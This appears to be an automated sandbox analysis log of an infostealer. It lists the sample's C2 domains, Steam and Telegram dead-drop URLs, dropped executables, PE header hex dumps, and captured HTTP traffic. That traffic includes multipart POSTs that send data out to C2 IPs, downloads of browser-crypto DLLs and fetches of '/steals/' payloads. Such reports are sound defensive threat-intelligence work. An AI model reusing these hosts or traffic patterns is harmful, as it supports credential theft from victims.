Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior

Source: C:\Users\user\Desktop\1lKbb2hF7fYToopfpmEvlyRN.exe	Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h		0_2_0605D4C8
Source: C:\ProgramData\DBAAFIDGDA.exe	Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h		5_2_0614D4C8

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: indexterityszcoxp.shop
Source: Malware configuration extractor	URLs: lariatedzugspd.shop
Source: Malware configuration extractor	URLs: callosallsaospz.shop
Source: Malware configuration extractor	URLs: callosallsaospz.shop
Source: Malware configuration extractor	URLs: outpointsozp.shop
Source: Malware configuration extractor	URLs: outpointsozp.shop
Source: Malware configuration extractor	URLs: liernessfornicsa.shop
Source: Malware configuration extractor	URLs: upknittsoappz.shop
Source: Malware configuration extractor	URLs: shepherdlyopzc.shop
Source: Malware configuration extractor	URLs: unseaffarignsk.shop
Source: Malware configuration extractor	URLs: https://steamcommunity.com/profiles/76561199743486170
Source: Malware configuration extractor	URLs: https://t.me/s41l0

Yara detected Generic Downloader

Source: Yara match	File source: 5.0.DBAAFIDGDA.exe.9a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.DGDBKFBAKF.exe.fd0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\ProgramData\DGDBKFBAKF.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\jen1hg[1].exe, type: DROPPED
Source: Yara match	File source: C:\ProgramData\DBAAFIDGDA.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\gfn1go[1].exe, type: DROPPED

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 26 Jul 2024 16:56:38 GMTServer: ApacheLast-Modified: Wed, 24 Jul 2024 19:26:38 GMTETag: "4b3800-61e0341d0f4ad"Accept-Ranges: bytesContent-Length: 4929536Content-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 ae 6d 9f 66 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 06 00 00 bc 48 00 00 78 02 00 00 00 00 00 1e da 48 00 00 20 00 00 00 e0 48 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 4b 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d0 d9 48 00 4b 00 00 00 00 00 49 00 ec 70 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4b 00 0c 00 00 00 82 d9 48 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 24 ba 48 00 00 20 00 00 00 bc 48 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 73 64 61 74 61 00 00 1e 02 00 00 00 e0 48 00 00 04 00 00 00 c0 48 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 ec 70 02 00 00 00 49 00 00 72 02 00 00 c4 48 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 80 4b 00 00 02 00 00 00 36 4b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 26 Jul 2024 16:56:46 GMTServer: ApacheLast-Modified: Wed, 24 Jul 2024 19:26:36 GMTETag: "4df7e8-61e0341b8d2e0"Accept-Ranges: bytesContent-Length: 5109736Content-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 b3 6b 9f 66 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 06 00 00 80 4b 00 00 40 02 00 00 00 00 00 9e 9f 4b 00 00 20 00 00 00 a0 4b 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 4e 00 00 04 00 00 06 6f 4e 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 50 9f 4b 00 4b 00 00 00 00 c0 4b 00 8c 38 02 00 00 00 00 00 00 00 00 00 10 dd 4d 00 d8 1a 00 00 00 00 4e 00 0c 00 00 00 05 9f 4b 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 a4 7f 4b 00 00 20 00 00 00 80 4b 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 73 64 61 74 61 00 00 1e 02 00 00 00 a0 4b 00 00 04 00 00 00 84 4b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 8c 38 02 00 00 c0 4b 00 00 3a 02 00 00 88 4b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 4e 00 00 02 00 00 00 c2 4d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Source: global traffic	HTTP traffic detected: GET /profiles/76561199747278259 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /s41l0 HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache

Source: Joe Sandbox View	IP Address: 23.199.218.33 23.199.218.33
Source: Joe Sandbox View	IP Address: 5.75.212.60 5.75.212.60
Source: Joe Sandbox View	IP Address: 149.154.167.99 149.154.167.99
Source: Joe Sandbox View	IP Address: 149.154.167.99 149.154.167.99

Source: Joe Sandbox View	ASN Name: AKAMAI-ASUS AKAMAI-ASUS
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View	JA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
Source: Joe Sandbox View	JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CFHCGHJDBFIIDGDHIJDBUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Content-Length: 279Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DGHDHIDGHIDGIECBKKJJUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IIDHJDGCGDAAKEBGDBKFUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GIJJKFCGDGHDHIECGCBKUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Content-Length: 332Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CAAAAFBKFIECAAKECGCAUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Content-Length: 5605Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sqls.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JEGHDAFIDGDAAKEBFHDAUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Content-Length: 4677Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GDAAKFIDGIEGDGDHIDAKUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Content-Length: 1529Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IEGCBAAFHDHDHJKEGCFCUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AEGDBAFHJJDAKEBGCFCBUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /freebl3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /softokn3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /nss3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JJKEBGHJKFIDGCAAFCAFUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Content-Length: 1145Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HIDAKFIJJKJJJKEBKJEHUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----ECFCBFBGDBKJKECAAKKFUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HIDGCFBFBFBKEBGCAFCGUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Content-Length: 498Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----EGDGIIJJECFIDHJJKKFCUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Content-Length: 498Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: liernessfornicsa.shop
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HCGCBFHCFCFBFIEBGHJEUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 42Host: liernessfornicsa.shop
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CAEHDBAAECBFHJKFCFBFUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Content-Length: 457Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18158Host: liernessfornicsa.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8779Host: liernessfornicsa.shop
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HCAAEBKEGHJKEBFHJDBFUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Content-Length: 130977Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20432Host: liernessfornicsa.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1228Host: liernessfornicsa.shop
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HJDBFBKKJDHJKECBGDAKUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 5.75.212.60Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 587838Host: liernessfornicsa.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 77Host: liernessfornicsa.shop
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.0 Safari/537.36Host: 65.108.151.108Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KKJKKJJKJEGIECAKJJEBUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.0 Safari/537.36Host: 65.108.151.108Content-Length: 279Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DHCGHDHIDHCBGCBGCAEBUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.0 Safari/537.36Host: 65.108.151.108Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DGCBAFIJDGHCAKECAEGCUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.0 Safari/537.36Host: 65.108.151.108Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AECAKECAEGDHIECBGHIIUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.0 Safari/537.36Host: 65.108.151.108Content-Length: 332Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CGIDAAAKJJDBGCBFCBGIUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.0 Safari/537.36Host: 65.108.151.108Content-Length: 5485Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sqls.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.0 Safari/537.36Host: 65.108.151.108Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----FHCAEGCBFHJDGCBFHDAFUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.0 Safari/537.36Host: 65.108.151.108Content-Length: 4677Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /steals/jen1hg.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /steals/gfn1go.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36Host: 147.45.44.104Cache-Control: no-cache

Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.212.60
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.212.60
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.212.60
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.212.60
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.212.60
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.212.60
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.212.60
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.212.60
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.212.60
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.212.60
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.212.60
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.212.60
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.212.60
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.212.60
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.212.60
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.212.60
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.212.60
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.212.60
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.212.60
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.212.60
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.212.60
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.212.60
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.212.60
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.212.60
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.212.60
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.212.60
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.212.60
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.212.60
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.212.60
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.212.60
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.212.60
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.212.60
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.212.60
Source: unknown	TCP traffic detected without corresponding DNS query: 5.75.212.60
